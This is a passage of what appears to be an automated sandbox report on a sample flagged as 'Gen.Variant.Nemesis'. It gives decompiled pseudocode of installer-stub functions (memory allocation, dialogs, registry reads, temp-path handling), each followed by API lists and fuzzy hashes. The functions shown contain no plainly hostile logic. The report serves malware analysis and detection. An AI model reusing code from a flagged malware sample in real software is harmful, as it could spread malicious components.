                                                                                                                        					}
                                                                                                                        					if(_t88 == 0) {
                                                                                                                        						_t48 =  *0x70b25070;
                                                                                                                        						_t77 =  *_t48;
                                                                                                                        						 *_t48 =  *_t77;
                                                                                                                        						_t49 = _v0;
                                                                                                                        						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                                                                        						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                                                                        							E70B21603(_t49, _t77 + 8, 0x38);
                                                                                                                        							_t86 = _t86 + 0xc;
                                                                                                                        						}
                                                                                                                        						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                                                                        						GlobalFree(_t77);
                                                                                                                        						goto L26;
                                                                                                                        					}
                                                                                                                        					_t54 = _t29 - 0x46;
                                                                                                                        					if(_t54 == 0) {
                                                                                                                        						_t82 = GlobalAlloc(0x40,  *0x70b2506c +  *0x70b2506c + 8);
                                                                                                                        						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                                                                        						_t14 = _t82 + 8; // 0x8
                                                                                                                        						E70B21603(_t14, _v0, 0x38);
                                                                                                                        						_t86 = _t86 + 0xc;
                                                                                                                        						 *_t82 =  *( *0x70b25070);
                                                                                                                        						 *( *0x70b25070) = _t82;
                                                                                                                        						goto L26;
                                                                                                                        					}
                                                                                                                        					_t63 = _t54 - 6;
                                                                                                                        					if(_t63 == 0) {
                                                                                                                        						goto L23;
                                                                                                                        					}
                                                                                                                        					_t64 = _t63 - 4;
                                                                                                                        					if(_t64 == 0) {
                                                                                                                        						 *_t74 =  *_t74 + 0xa;
                                                                                                                        						goto L13;
                                                                                                                        					}
                                                                                                                        					_t40 = _t64 - _t67;
                                                                                                                        					if(_t40 == 0) {
                                                                                                                        						 *_t74 =  *_t74 + 0xa;
                                                                                                                        						goto L11;
                                                                                                                        					}
                                                                                                                        					goto L8;
                                                                                                                        					L26:
                                                                                                                        				} while ( *_t74 != 0);
                                                                                                                        				_t27 = _v0;
                                                                                                                        				goto L28;
                                                                                                                        			}


























                                                                                                                        0x70b2114c
                                                                                                                        0x70b211e9
                                                                                                                        0x70b211ed
                                                                                                                        0x70b211f7
                                                                                                                        0x70b211fb
                                                                                                                        0x70b21205
                                                                                                                        0x70b2120a
                                                                                                                        0x70b21211
                                                                                                                        0x00000000
                                                                                                                        0x70b21211
                                                                                                                        0x70b21152
                                                                                                                        0x70b21155
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b2115b
                                                                                                                        0x70b2115e
                                                                                                                        0x70b211b8
                                                                                                                        0x00000000
                                                                                                                        0x70b211b8
                                                                                                                        0x70b21160
                                                                                                                        0x70b21162
                                                                                                                        0x70b2119e
                                                                                                                        0x00000000
                                                                                                                        0x70b2119e
                                                                                                                        0x00000000
                                                                                                                        0x70b212a1
                                                                                                                        0x70b212a1
                                                                                                                        0x70b212ab
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 70B21171
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 70B211E3
                                                                                                                        • GlobalFree.KERNEL32 ref: 70B2124A
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70B2129B
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70B212B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1780285237-0
                                                                                                                        • Opcode ID: b4655cf8f272e5400f228ab02f75b9b6c88ab90ffc8fcf10543aafeffd3c0309
                                                                                                                        • Instruction ID: 8d28144c002b9c8b57557455f2671063ea4af65ba5d8881c33d054952fec5520
                                                                                                                        • Opcode Fuzzy Hash: b4655cf8f272e5400f228ab02f75b9b6c88ab90ffc8fcf10543aafeffd3c0309
                                                                                                                        • Instruction Fuzzy Hash: 4B5191B6900201DFD711CF65EC85A6A77F8FB98316B244919F90ADB321EB34EB12CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                                                        				signed int _t14;
                                                                                                                        				int _t17;
                                                                                                                        				void* _t24;
                                                                                                                        				intOrPtr* _t29;
                                                                                                                        				void* _t31;
                                                                                                                        				signed int _t32;
                                                                                                                        				void* _t35;
                                                                                                                        				void* _t40;
                                                                                                                        				signed int _t42;
                                                                                                                        
                                                                                                                        				_t29 = __edi;
                                                                                                                        				_t24 = __ebx;
                                                                                                                        				_t14 =  *(_t35 - 0x28);
                                                                                                                        				_t40 = __edx - 0x38;
                                                                                                                        				 *(_t35 - 0x10) = _t14;
                                                                                                                        				_t27 = 0 | _t40 == 0x00000000;
                                                                                                                        				_t32 = _t40 == 0;
                                                                                                                        				if(_t14 == __ebx) {
                                                                                                                        					if(__edx != 0x38) {
                                                                                                                        						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                                                                        					} else {
                                                                                                                        						E00402DA6(0x21);
                                                                                                                        						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll", 0x400);
                                                                                                                        						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll");
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					E00402D84(1);
                                                                                                                        					 *0x40adf0 = __ax;
                                                                                                                        					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                                                        				}
                                                                                                                        				 *(_t35 + 8) = _t17;
                                                                                                                        				if( *_t29 == _t24) {
                                                                                                                        					L13:
                                                                                                                        					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                                                        				} else {
                                                                                                                        					_t31 = E0040649D(_t27, _t29);
                                                                                                                        					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                                                                                        						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll",  *(_t35 + 8));
                                                                                                                        						_t42 = _t14;
                                                                                                                        						if(_t42 == 0) {
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						goto L13;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 00402695
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp$C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll
                                                                                                                        • API String ID: 1659193697-4252931006
                                                                                                                        • Opcode ID: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
                                                                                                                        • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                                                        • Opcode Fuzzy Hash: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
                                                                                                                        • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00403019(intOrPtr _a4) {
                                                                                                                        				long _t2;
                                                                                                                        				struct HWND__* _t3;
                                                                                                                        				struct HWND__* _t6;
                                                                                                                        
                                                                                                                        				if(_a4 == 0) {
                                                                                                                        					if( *0x42aa20 == 0) {
                                                                                                                        						_t2 = GetTickCount();
                                                                                                                        						if(_t2 >  *0x434f0c) {
                                                                                                                        							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                                                                                        							 *0x42aa20 = _t3;
                                                                                                                        							return ShowWindow(_t3, 5);
                                                                                                                        						}
                                                                                                                        						return _t2;
                                                                                                                        					} else {
                                                                                                                        						return E00406946(0);
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t6 =  *0x42aa20;
                                                                                                                        					if(_t6 != 0) {
                                                                                                                        						_t6 = DestroyWindow(_t6);
                                                                                                                        					}
                                                                                                                        					 *0x42aa20 = 0;
                                                                                                                        					return _t6;
                                                                                                                        				}
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102729457-0
                                                                                                                        • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                        • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                        • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                        • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 53%
                                                                                                                        			E00405F14(void* __eflags, intOrPtr _a4) {
                                                                                                                        				int _t11;
                                                                                                                        				signed char* _t12;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				intOrPtr* _t21;
                                                                                                                        				signed int _t23;
                                                                                                                        
                                                                                                                        				E0040653D(0x42fa70, _a4);
                                                                                                                        				_t21 = E00405EB7(0x42fa70);
                                                                                                                        				if(_t21 != 0) {
                                                                                                                        					E004067C4(_t21);
                                                                                                                        					if(( *0x434f18 & 0x00000080) == 0) {
                                                                                                                        						L5:
                                                                                                                        						_t23 = _t21 - 0x42fa70 >> 1;
                                                                                                                        						while(1) {
                                                                                                                        							_t11 = lstrlenW(0x42fa70);
                                                                                                                        							_push(0x42fa70);
                                                                                                                        							if(_t11 <= _t23) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t12 = E00406873();
                                                                                                                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                        								E00405E58(0x42fa70);
                                                                                                                        								continue;
                                                                                                                        							} else {
                                                                                                                        								goto L1;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						E00405E0C();
                                                                                                                        						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                                                        					}
                                                                                                                        					_t18 =  *_t21;
                                                                                                                        					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                        						goto L1;
                                                                                                                        					} else {
                                                                                                                        						goto L5;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L1:
                                                                                                                        				return 0;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                        • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                        • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 3248276644-3355392842
                                                                                                                        • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                        • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                        • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                        • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                        				int _t15;
                                                                                                                        				long _t16;
                                                                                                                        
                                                                                                                        				_t15 = _a8;
                                                                                                                        				if(_t15 != 0x102) {
                                                                                                                        					if(_t15 != 0x200) {
                                                                                                                        						_t16 = _a16;
                                                                                                                        						L7:
                                                                                                                        						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                                                                                        							_push(_t16);
                                                                                                                        							_push(6);
                                                                                                                        							 *0x42d254 = _t16;
                                                                                                                        							E00404ED4();
                                                                                                                        						}
                                                                                                                        						L11:
                                                                                                                        						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                                                                                        					}
                                                                                                                        					if(IsWindowVisible(_a4) == 0) {
                                                                                                                        						L10:
                                                                                                                        						_t16 = _a16;
                                                                                                                        						goto L11;
                                                                                                                        					}
                                                                                                                        					_t16 = E00404E54(_a4, 1);
                                                                                                                        					_t15 = 0x419;
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				if(_a12 != 0x20) {
                                                                                                                        					goto L10;
                                                                                                                        				}
                                                                                                                        				E004044E5(0x413);
                                                                                                                        				return 0;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00405542
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                                                          • Part of subcall function 004044E5: SendMessageW.USER32(00010418,00000000,00000000,00000000), ref: 004044F7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                        • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                        • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                                                        • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                        • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                                                        				int _v8;
                                                                                                                        				long _t21;
                                                                                                                        				long _t24;
                                                                                                                        				char* _t30;
                                                                                                                        
                                                                                                                        				asm("sbb eax, eax");
                                                                                                                        				_v8 = 0x800;
                                                                                                                        				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                                                        				_t30 = _a16;
                                                                                                                        				if(_t21 != 0) {
                                                                                                                        					L4:
                                                                                                                        					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                        				} else {
                                                                                                                        					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                                                        					_t21 = RegCloseKey(_a20);
                                                                                                                        					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                                                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                        						goto L4;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t21;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 0040645C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue
                                                                                                                        • String ID: Call
                                                                                                                        • API String ID: 3356406503-1824292864
                                                                                                                        • Opcode ID: eb34a040627e01bcb606dc2e4c4799520f54f2f9c4d469aea035b4a21a86aa31
                                                                                                                        • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                        • Opcode Fuzzy Hash: eb34a040627e01bcb606dc2e4c4799520f54f2f9c4d469aea035b4a21a86aa31
                                                                                                                        • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00403B57() {
                                                                                                                        				void* _t2;
                                                                                                                        				void* _t3;
                                                                                                                        				void* _t6;
                                                                                                                        				void* _t8;
                                                                                                                        
                                                                                                                        				_t8 =  *0x42b22c;
                                                                                                                        				_t3 = E00403B3C(_t2, 0);
                                                                                                                        				if(_t8 != 0) {
                                                                                                                        					do {
                                                                                                                        						_t6 = _t8;
                                                                                                                        						_t8 =  *_t8;
                                                                                                                        						FreeLibrary( *(_t6 + 8));
                                                                                                                        						_t3 = GlobalFree(_t6);
                                                                                                                        					} while (_t8 != 0);
                                                                                                                        				}
                                                                                                                        				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                                                                                        				return _t3;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,75AF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 1100898210-3355392842
                                                                                                                        • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                        • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                        • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                        • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 77%
                                                                                                                        			E00405E58(WCHAR* _a4) {
                                                                                                                        				WCHAR* _t5;
                                                                                                                        				WCHAR* _t7;
                                                                                                                        
                                                                                                                        				_t7 = _a4;
                                                                                                                        				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                                                        				while( *_t5 != 0x5c) {
                                                                                                                        					_push(_t5);
                                                                                                                        					_push(_t7);
                                                                                                                        					_t5 = CharPrevW();
                                                                                                                        					if(_t5 > _t7) {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				 *_t5 =  *_t5 & 0x00000000;
                                                                                                                        				return  &(_t5[1]);
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003), ref: 00405E6E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-3370423016
